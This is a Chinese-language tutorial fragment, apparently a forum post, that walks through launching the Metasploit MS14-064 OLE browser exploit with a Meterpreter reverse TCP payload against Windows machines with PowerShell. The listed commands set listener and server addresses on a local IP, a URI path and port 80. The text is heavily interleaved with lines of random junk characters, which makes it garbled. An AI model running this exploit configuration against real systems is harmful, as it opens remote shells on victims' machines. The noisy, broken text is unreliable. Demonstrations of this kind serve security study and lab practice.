) c* U$ U6 ^) c( Q, _0 W 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
& I& A: c5 G) S9 n T$ s9 N
# b4 Q$ q, F6 a9 a
) L, N( f9 C: \- X 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
! e) d, u, F' J# e" Y5 R3 c
6 }" \- }* @. k; m1 j
4 v! h& D2 G. }3 V& o% I) F 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
. P; J+ @' G @! A! U
9 C* Q1 d; P( i3 f; V
' y! l) _6 h) p% |- v/ _% l7 F set AllowPowershellPrompt true
# V6 J: {" F2 \
8 W8 _/ j+ F" {7 o
# U! s0 G* ^5 F
Set LHOST 192.168.0.109; K! V1 X8 F2 k8 T2 ^$ N& g; Y$ O' \3 b
8 `0 R. u0 I, r/ P7 u7 s3 L* W+ h2 n, K, Q6 \+ U, Q5 Q
set SRVHOST 192.168.0.109* ]) H3 g& q) w8 u
$ E$ S8 B9 {8 g9 e
0 ?0 [3 V" |8 u i" u2 p Set uripath share
X2 m% I+ B& k- q
5 R+ M1 u5 A( S$ }# Q1 c: Z: C
8 T0 b" \; T! [; L# h" V6 S. [! r
Set srvport 80
( p6 J! {) f3 m& e( ~: P
) |9 ]( C, ?2 n J* c
$ D- M3 y" s6 b
* E, P/ u2 L, _ ^1 P @" v
$ J ]* D5 |- o8 J; |
7 Y' h( z6 H% p) }: j9 j# {
1 m* _1 v6 d( i E8 `4 ]+ Q
3 H0 m' m8 _9 [5 I
' u# r, q& K7 q3 h7 @: R # N$ |! E8 T; z2 p2 b8 b
, Z- d, b- R$ ^! A+ r/ ]8 {
' N6 ^. j5 o$ V% k. Q
% B3 N5 S# R1 c/ k
( _- w5 h: e, D; V- w
' L. s$ z; a) Z) Z. u $ T) `: N: a1 y% N# Z' @$ C+ z' M
/ A3 k# ~% n, p
5 |, S I+ V" q6 a 下面我们来访问本地地址如图:
z+ \+ T. b0 I/ e1 z- q2 x
. d+ {: z! Z, @ }3 A% q8 i% ^
+ j. y( ^& T- S: q Y
9 V, i* z* |, F3 G1 U1 d1 Z- K
$ q& o6 n' e1 p3 b# z* j B7 F- @' G1 E9 g! G& Q
1 y" F' c& M1 ^5 w: P( x
- c0 |7 g% c! W9 B/ {
3 c: q3 @. w$ j$ u) H$ U
9 R( W6 {9 A( \1 w